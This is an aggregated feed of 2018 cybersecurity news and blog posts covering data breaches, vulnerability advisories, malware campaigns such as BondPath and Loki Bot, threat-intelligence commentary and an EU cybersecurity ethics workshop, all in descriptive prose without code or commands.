In the process of monitoring changes in the threat landscape, we get a clearer insight into the way threat actors work behind the schemes. 

Microsoft Windows zero-day vulnerability disclosed through Twitter

Microsoft has quickly reacted to the disclosure of a previously unknown zero-day vulnerability in the Windows operating system.

Addressing Challenges in Hybrid Cloud Security

Hybrid environments can come with risks and challenges, especially for organizations adopting DevOps.

Air Canada Reveals Mobile Data Breach, Passport Numbers Potentially Exposed

Air Canada reported a data breach involving the airline’s mobile app which may have led to the exposure of passport details for 20,000 customers.

Banks in Peru Hit by Phishing Attack Using Bitcoin Advertisements as Lure

Using phishing emails intended to lure victims via clickable links, phishing attempts were also seen in other countries, including Thailand, Malaysia, Indonesia, the USA, and more.

Tech Industry Pursues a Federal Privacy Law, on Its Own Terms

Tech giants are lobbying government officials to outline a federal privacy law that would overrule the recent California law.

Unseen Threats, Imminent Losses

A review of the first half of 2018 shows a threat landscape that not only has familiar features, but also has morphing and uncharted facets: Ever-present threats grew while emerging ones used stealth.

Exclusive: Iran-Based Political Influence Operation – Bigger, Persistent, Global

An Iranian influence operation targeting internet users worldwide is bigger than previously identified, encompassing a network of anonymous websites and social media accounts in 11 different languages.

Supply Chain Attack Operation Red Signature Targets South Korean Organizations

Together with our colleagues at IssueMakersLab, Trend Micro uncovered Operation Red Signature, an information theft-driven supply chain attack targeting organizations in South Korea.

T-Mobile was Hit by a Data Breach Affecting Around 2 Million Customers

Hackers gained access to personal information from roughly 2 million T-Mobile customers, including the name, billing zip code, phone number, email address, account number and account type of users.

Did the results from Trend Micro’s 2018 security report roundup surprise you? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Air Canada and Cryptojacking appeared first on .

Apple insists developers ramp up their privacy commitments

Apple recently told the U.S. Congress that is sees customer privacy as a “human right,” though the explanation didn’t at that time extend to how third-party developers treat data they get from iOS apps. Now it does.

Privacy for the rest of us

Starting October 3, Apple will insist that all third-party apps (including new apps and app updates) submitted to the App Store include a link to the app developer’s own privacy policy.

This is a big change, as until now only subscription-based apps needed to supply this information — and it also extends to the privacy policy itself, which Apple insists must be clear and explicitly in explaining:

To read this article in full, please click here

Applying Improv Techniques to Threat Intelligence

Threat intelligence is no joke. And yet, a few lessons from improv comedy can help us become better practitioners of it. While improv and threat intelligence make for an unlikely alliance, I invite you to explore how the former can positively impact the latter — and how Recorded Future can help.

First, improv. As its name suggests, improv comedy is all about improvising. It’s about doing well with the unexpected and doing the seemingly impossible. As a threat intelligence practitioner, you need to be well versed in doing both. There are two principles of improv comedy that are as important for actors on a stage as they are for analysts in the trenches: accepting a new reality, and the principle of “Yes, and …”

Accepting a New Reality

Improv is nothing if not a continuous exercise in accepting a new reality. That reality comes from audience suggestions that serve as the basis of subsequent scenes. Improvisers can’t fight that new reality — they have to embrace it.

The same is true for threat intelligence practitioners. If something bad happens — a peer company is hit by a ransomware attack, or an exploit kit becomes available for a vulnerability that might impact your organization — you can’t wish that new reality away. You have to recognize it, accept it, and defend against it. Recorded Future can help you not only validate this new reality, but also better understand it.

Forming a More Complete Picture

The principle of “Yes, and …” is what makes improv what it is. The basic premise is that in improv comedy, the actors need to say, “Yes, and …” to any “yes” or “no” question they may face. Take, for example, the question, “Do you want to go fishing?” If an actor says, “No,” then the scene comes to an abrupt end. That’s no fun for the audience or the actors. If, however, an actor says, “Yes, and let’s fly a kite off the back of the boat to pass the time,” now we’re getting somewhere. This affirmation not only allows the scene to continue, but also introduces additional elements that make for a more complete picture.

And that’s exactly what Recorded Future does. Armed with the content provided by Recorded Future — be it a list of IOCs (indicators of compromise), threat actor profiles, exploit chatter on an underground forum, or something else — Recorded Future puts you, as an analyst, in the position to not only answer “yes” to a manager’s question about an incident but to also say, “… and here is all of the information available about it.” Boom. That type of response can make you a star — be it on stage or in a SOC (security operations center).

Practices to Consider

You may well be applying the principles of accepting a new reality and “Yes, and …” without even knowing it. If you are, keep it up! If not, I would encourage you to try out these improv anecdotes. They help instill and reinforce a confidence in handling any type of situation that may come your way, which helps you protect your organization as best as you can. Give it a shot — you may be surprised at how well these improv principles can improve your practice of threat intelligence.

David Peduto

David Peduto is the product support manager at Recorded Future. He’s a proud (although somewhat unexpected) graduate of the Improv Asylum’s training center in Boston, and co-founder of the Fletcher Improv Group at The Fletcher School of Law and Diplomacy, Tufts University.

The post Applying Improv Techniques to Threat Intelligence appeared first on Recorded Future.


Value-Driven Cybersecurity

Constructing an Alliance for Value-driven Cybersecurity (CANVAS) launched ~two years ago with F-Secure as a member. The goal of the EU project is “to unify technology developers with legal and ethical scholars and social scientists to approach the challenge of how cybersecurity can be aligned with European values and fundamental rights.” (That’s a mouthful, right?) Basically, Europe wants to align cybersecurity and human rights.

If you don’t see the direct connection between human rights and cybersecurity, consider this: the EU’s General Data Protection Regulation (GDPR) is human rights law. Everybody’s data is covered by GDPR. Meanwhile, in the USA… California’s legislature is working on a data privacy bill, and there’s now a growing amount of lobbyists fighting over how to define just what a “consumer” is. So, in the USA, data protection is not human rights law, it’s consumer protection law (and there are likely to be plenty of legal loopholes). And in the end, not everybody’s data will be covered.

So there you go, the EU sees cybersecurity as something that affects everybody, and the CANVAS project is part of its efforts to ensure that the rights of all are respected.

As part of the project, on May 28th & 29th of this year, a workshop was organized by F-Secure at our HQ on ethics-related challenges that cybersecurity companies and cooperating organizations face in their research and operations. Which is to say, what are the considerations that cybersecurity companies and related organizations must take into account to be upstanding citizens?

The theme made for excellent workshop material. Also, the weather was uncharacteristically cooperative (we picked May to increase the odds in our favor), the presentations were great, and the resulting discussions were lively.

Topics included:

  • Investigation of nation-state cyber operations.
  • Vulnerability disclosure and the creation of proof-of-concept code for: public awareness; incentivizing vulnerability fixing efforts; security research; penetration testing; and other purposes.
  • Control of personal devices. Backdoors and use of government sponsored “malware” as possible countermeasures to the ubiquitous use of encryption.
  • Ethics, artificial intelligence, and cybersecurity.
  • Assisting law enforcement agencies without violating privacy, a CERT viewpoint.
  • Targeted attacks and ethical choices arising due to attacker and defender operations.
  • Privacy and its assurance through data economy and encryption, balancing values with financial interests of companies.

The workshop participants included a mix of cybersecurity practitioners and representatives from policy focused organizations. The Chatham House rule (in particular, no recording policy) was used to allow for free and open discussion.

So, in that spirit, names and talks won’t be included in text of this post. But, for those who are interested in reading more, approved bios and presentation summaries can be found in the workshop report (final draft).

Next up on the CANVAS agenda for F-Secure?

CISO Erka Koivunen will be in Switzerland next week (September 5th & 6th) at The Bern University of Applied Sciences attending a workshop on: Cybersecurity Challenges in the Government Sphere – Ethical, Legal and Technical Aspects.

Erka has worked in government in the past, so his perspective covers both sides of the fence. His presentation is titled: Serve the customer by selling… tainted goods?! Why F-Secure too will start publishing Transparency Reports.

Security Flaws & Fixes – W/E – 083118

Adobe Fixes Privilege Escalation Bug in Creative Cloud (08/29/2018)
Adobe released an update for Creative Cloud. This update alleviates an issue that could result in a privilege escalation condition.

Advisory Describes Mitigation Methods for ABB eSOMS Vulnerability (08/28/2018)
ABB eSOMS, an electronic shift operations management system, is affected by an improper authentication issue, which has been described in an advisory. Mitigation techniques are depicted in the alert.

Chashing Apps Serve Up Private Data Via SDKs (08/28/2018)
According to analysis from Appthority, several software developer kits (SDKs) from AppSee and Testfairy have the capability to capture sensitive data whenever a mobile app crashes. These particular SDKs enable developers to understand why apps crash, but when an app indeed crashes, the SDKs take screenshots of the devices. "This opens up doors for new exploits in enterprise mobile environments, as third-parties are increasingly recording mobile screens for debugging purpose and sending them back to external servers," Appthority's Su Mon Kywe warned in a blog post.

Cisco Advises on Multiple Product Vulnerabilities (08/29/2018)
Cisco has released a batch of advisories discussing vulnerabilities across its product lines. Among the most critical issues are a Linux kernel IP fragment assembly bug affecting multiple products, Linux and FreeBSD kernel bugs affecting multiple bugs, and a path transversal vulnerability in the Data Center Network Manager.

Facebook Squashes Info Disclosure Bug (08/29/2018)
Facebook server bug that could leak information and enable command execution has been patched after the company received notification from the researchers at SCRT Information Security. The server's Sentry service, an open-source error tracking app that is written in Python and Django, regularly showed stack traces, which identify the functions that are working at the time of an error, and appeared to be unstable. 
Further investigation showed the stack traces printing the entire application.

Firmware Update Available for Qualcomm Life's Capsule (08/28/2018)
Qualcomm Life's Capsule Datacaptor Terminal Server contains a code weakness bug that could enable an attacker to execute unauthorized code to obtain administrator-level privileges on the device. Users may download updated firmware for this issue, as discussed in an ICS-CERT advisory.

Fiserv Bug Exposed Accounts at Numerous Banks (08/28/2018)
Security researcher Brian Krebs uncovered information regarding a vulnerability within Fiserv's Web platform that resulted in the compromise of customer personal and financial data across hundreds of banking Web sites. Fiserv is a technology service provider offering account and transaction processing systems to financial institutions. KrebsOnSecurity was notified by third-party researcher Kristian Erik Hermansen of a flaw in the Fiserv platform that enabled him to access account data for customers through sequential event numbers. Hermansen attempted to contact Fiserv with no luck but Krebs was able to notify the company, which has since resolved the issue. Krebs has been told by experts that 1,700 banks use the Fiserv platform.

Multiple Advisories Posted for Schneider Electric Vulnerabilities (08/28/2018)
Multiple vulnerabilities affect Schneider Electric products. The ICS-CERT has issued two advisories for Modicon M221 to address an improper check for unusual or exceptional conditions and bugs that could result in attackers replaying authentication sequences, overwriting passwords, or decoding passwords. A third advisory pertains to a cross-site scripting issue in PowerLogic PM5560.

Patched Apache Struts Bug Being Exploited to Drop Cryptocurrency Miner (08/28/2018)
Within a day of the Apache Foundation's August 22 release of a fix for a critical bug in the Struts Framework, a proof-of-concept (PoC) exploit was issued online. On August 24, a Python script was released to make use of the exploit. Once the PoC was released, Volexity observed active scanning and attempted exploitation of the vulnerability across its sensor network. One threat actor was seen exploiting the Struts vulnerability in an effort to install the CNRig cryptocurrency miner.

TechCrunch: Sprint's Security Blunder Leaves Customer Data Exposed (08/27/2018)
Sprint is coming under fire for a report by TechCrunch which revealed a major security blunder on the carrier's part. According to the expose, Sprint was employing at least two sets of easily-guessed login credentials to secure a portal which provided access to customer data for Boost Mobile and Virgin Mobile customers. The issue was apparently brought to light by a third-party security researcher, who was able to obtain unauthorized access to the portal in question. Making matters worse was the fact the portal could also be accessed by a hacker with nothing more than a customer account phone number and a four-digit pin. The phone number could be easily obtained, while the system provided an unlimited number of guesses for entering the pin. This means that any hacker could brute-force their way into the system with a maximum of 9,999 attempts. One mitigating factor in this incident is the fact that the customer portal was never meant for public use, and is largely unknown outside of Sprint's own staff. However, the carrier has confirmed the incident to TechCrunch and promises that it is already in the process of "research[ing] the issue" to prevent any future recurrence.

Windows 10 Susceptible to Unpatched Local Privilege Escalation Bug (08/28/2018)
A security researcher tweeted details about an unpatched bug in the Windows 10 operating system. The researcher also posted a link to the proof-of-concept on GitHub. Will Dormann, an analyst at CERT/CC, confirmed the local privilege escalation vulnerability in a fully patched 64-bit Windows 10 system. The bug is in the Advanced Local Procedure Call interface. US-CERT has published an advisory.

Malware Watch – W/E – 083118

Abused IQY Files Exploited by Spam Campaign to Serve Up Malware (08/28/2018)
Trend Micro spotted increased abuse of the Internet query file IQY and expects that the simple structure of IQY files are being exploited to evade structure-based detection methods. The Cutwail botnet has been distributing spam mails abusing IQY files and targeting users in Japan through infections with the Bebloh or Ursnif malware.

AdvisorsBot Downloader Has Fingerprint Capabilities (08/27/2018)
Campaigns using the AdvisorsBot downloader as a first-stage payload are loading a fingerprinting module to further infect targets of interest with other types of malware. According to research conducted by Proofpoint, AdvisorsBot is in use by a threat entity called TA555 and is under active development. The malware was first seen in May and has been continually evolving.

Asacub Banking Trojan Is Back to Take Aim at Russian Banking Customers (08/28/2018)
Kaspersky Lab researchers analyzed a new variant of the Asacub mobile banking Trojan, which is designed to steal money from Android users connected to the mobile banking service of one of Russia's largest banks. Asacub is propagated via phishing SMS messages containing a link and an offer to view a photo or MMS. Asacub prompts the user either for Device Administrator rights or for permission to use AccessibilityService. After receiving the rights, it sets itself as the default SMS app and disappears from the device screen. If the user ignores or rejects the request, the window reopens every few seconds.

BusyGasper" Malware Logs Keystrokes, Spies on Victims (08/29/2018)
Kaspersky Lab has identified "BusyGasper," an Android malware sample that listens in on devices, can bypass the Doze battery saver, log keystrokes, and exfiltrate data from messaging apps. BusyGasper has a multicomponent structure and can download a payload or updates from its command and control server, which is an FTP server belonging to the free Russian web hosting service Ucoz.

CEIDPageLock Browser Hijacker Distributed by RIG Exploit Kit (08/30/2018)
The RIG Exploit Kit is pushing out a rootkit called CEIDPageLock, a sophisticated browser hijacker. Although CEIDPageLock was known prior to this research conducted by Check Point Software, the malware has new functionality, including a capability that monitors user browsing and dynamically replaces the content of several popular Chinese Web sites with fake home pages, whenever the user tries to visit them. Based on the information obtained by Check Point, CEIDPageLock particularly targets Chinese victims.

Kaspersky Lab Reports on Botnet Activity for First Half of the Year (08/29/2018)
Multifunctional malware, which is not designed for a specific purpose but can handle a multitude of tasks, became widespread in the first half of 2018. This information comes from Kaspersky Lab's analysis of over 150 malware families and their modifications circulating through 60,000 botnets. The vendor identified njRAT, an easily modified backdoor, as the most widespread remote access Trojan (RAT) downloaded by bots during the period between January and June 2018.

Loki Bot Malware Found in New Spam Campaign (08/29/2018)
The Loki Bot malware has been spotted in a malicious campaign targeting corporate mailboxes. Loki Bot steals passwords and sends them to its malware owners. Kaspersky Lab's team uncovered this campaign.

Mirai Variants Emerge with the Ability to Infect Multiple Platforms (08/28/2018)
New Linux Mirai variants have been seen by the researchers at Symantec after a remote server hosting multiple malware samples was identified. The variants are robust and compatible with multiple architectures and devices, meaning that routers, IP cameras, and Android devices can be vulnerable. In a blog post, Dinesh Venkatesan said, "As with many Mirai infections, it starts by firing a shell script on a vulnerable device. That shell script sequentially tries downloading and executing individual executables one by one until a binary compliant with the current architecture is found."

RansomWarrior Can Be Decrypted, Thanks to Check Point Tool (08/30/2018)
Check Point Software's team of security researchers has released a decryption tool for the RansomWarrior ransomware. The encryption used by the ransomware is a stream cipher utilizing a key randomly chosen from a list of 1,000 hard-coded keys in RansomWarrior's binary code. Check Point was able to extract the keys and since the key's index is saved locally on the victim's computer, provide the correct keys to the ransomware itself in order to unlock the files.

Urpage Threat Entity Connected to Other Threat Groups (08/29/2018)
Trend Micro's researchers have studied "Urpage," a new threat actor that shares similarities with the Confucius and Patchwork threat entities. Urpage is targeting InPage, a word processor for Urdu and Arabic languages and uses various malicious techniques, including backdoors, iOS malware, downloaders, and more.

Cybercrime – W/E – 083118

Google Warns Senator's Office of Phishing Emails (08/28/2018)
Google warned Senator Pat Toomey's office that nation-state hackers sent phishing emails to old campaign accounts, the Associated Press (AP) reported. Steve Kelly, a spokesman for the Pennsylvania senator said the accounts that were phished were considered dormant and had not been used since the end of the 2016 campaign. Toomey is currently in office and the attacks would not have affected the midterm elections. Google suggested that the phishing emails were just seeking information as they did not contain links to malware.

Iranian Threat Group "Cobalt Dickens" Attacks Universities in Various Nations (08/28/2018)
SecureWorks researchers discovered an URL spoofing a login page for a university. Further research into the IP address hosting the spoofed page revealed a large campaign to steal credentials. Sixteen domains contained over 300 spoofed Web sites and login pages for 76 universities located in 14 countries, including Australia, Canada, China, Israel, Japan, Switzerland, Turkey, the United Kingdom, and the US. Because the threat entity is using similar operations to Cobalt Dickens, a group that has ties to the Iranian government, SecureWorks personnel believe the entities are one and the same. Cobalt Dickens previously attacked universities, using stolen credentials to swipe intellectual property from library systems.

Possible Iranian Operation Using Network of Fake News Sites to Influence Audiences (08/27/2018)
FireEye has identified a suspected influence operation that appears to originate from Iran aimed at audiences in the US, UK, Latin America, and the Middle East. This operation is leveraging a network of inauthentic news sites and clusters of associated accounts across multiple social media platforms to promote political narratives in line with Iranian interests. These narratives include anti-Saudi, anti-Israeli, and pro-Palestinian themes, as well as support for specific US policies favorable to Iran, such as the US-Iran nuclear deal (JCPOA). FireEye suspects that the operation is Iranian in nature due to site registration data and the linking of social media accounts to Iranian phone numbers.

Report Suggests Lazarus Group Was Behind Indian Bank Heist of $13.5 Million (08/28/2018)
Scientists at Securonix uncovered details regarding a cyber attack targeting the SWIFT/ATM infrastructure of Cosmos Bank, a 112-year old cooperative bank in India and the second largest in the country, resulting in a loss of over $13.5 million USD. According to analysis, the hackers first gained a foothold into the banking system and then used that to fully compromise its internal and ATM structure. The attack involved multiple targeted malware infections followed by the setup of a malicious ATM/POS switch which hijacked connections between the central switch and the Core Banking System. The attackers then made adjustments to the target account balances to enable withdrawals. Securonix says that the North Korean-sponsored Lazarus Group is to blame for the attack on Cosmos Bank.

New BondPath Android Spyware Retrieves Chat Data From Messaging Apps

Researchers uncovered an Android spyware family called BondPath that is capable of retrieving chats from several mobile messaging apps while spying on other types of information.

BondPath has been around since May 2016, but in July 2018, researchers at Fortinet observed that some samples were still in the wild. Those specimens masqueraded as “Google Play Store Services,” an application signed by an unknown developer known only as “hola.” The name of this malicious application is intentionally similar to Google Play Services, the title of the process Google uses to update Android apps from the Play Store.

Upon successful execution, BondPath assumes the ability to steal an infected device’s browser history, call logs, emails and SMS messages. But a few less frequently used capabilities made BondPath stand out to the researchers, such as its ability to monitor an infected smartphone’s battery status. It could also steal chats from WhatsApp, Skype, Facebook, Line and other mobile messaging apps.

The Rise and Fall of Spyware

According to Verizon’s “2018 Data Breach Investigations Report,” spyware and keylogger malware were involved in 121 security incidents and 74 data breaches in 2017. This threat category increased its activity during the second half of 2017 and the beginning of 2018, yielding a 56 percent increase in detections during the first quarter of 2018, according to Malwarebytes. Spurred in part by a series of large attack campaigns pushing Emotet, Malwarebytes named spyware as the top detected business threat for the quarter.

Near the end of the first quarter, spyware activity declined significantly. It continued falling throughout the second quarter, ultimately decreasing by 40 percent, according to Malwarebytes. In that span of time, TrickBot was the most prevalent form of spyware after it added the ability to hijack cryptocurrency earlier in the year.

How to Protect Against Mobile Threats

To defend their organizations against BondPath and similar mobile threats that originate in official app stores, security teams should keep applications and operating systems running at the current patch level, verify the legitimacy of unsolicited email attachments through a separate channel, and monitor their IT environment for the indicators of compromise (IoCs) listed in the IBM X-Force Exchange threat advisory.

Sources: Fortinet, Verizon, Malwarebytes, Malwarebytes(1)

The post New BondPath Android Spyware Retrieves Chat Data From Messaging Apps appeared first on Security Intelligence.

Windows and .Net finally get their ‘D Week’ patches, as Intel microcode fixes go wacko

Time for the final August patching shoe to drop.

Late last night Microsoft released a flurry of patches, posting them on the Microsoft Update Catalog. Some are available through Windows Update, some aren't.

As of early Friday morning, the Win10 patches are not available through WSUS, the update server service. It’s not clear if that’s a mistake, a hesitation — or if somebody just went home last night and forgot.

Let’s hear it for patching predictability. And transparency.

To read this article in full, please click here

You’ve got malware!

Flashback to the early 2000s, when this non-IT pilot fish works in a building where the level of computer literacy is hovering near absolute zero.

"I was the only person in my department who had any computer skills at all," fish grumbles.

"One day we all got an email notice from management about a virus that was going around, spread by email. We were warned about clicking links and opening pages and all the other standard warnings."

Fish suspects that most people in the department will just delete the warning, since they don't use their computers for anything but the bare minimum required by company business -- and they barely understand even that.

To read this article in full, please click here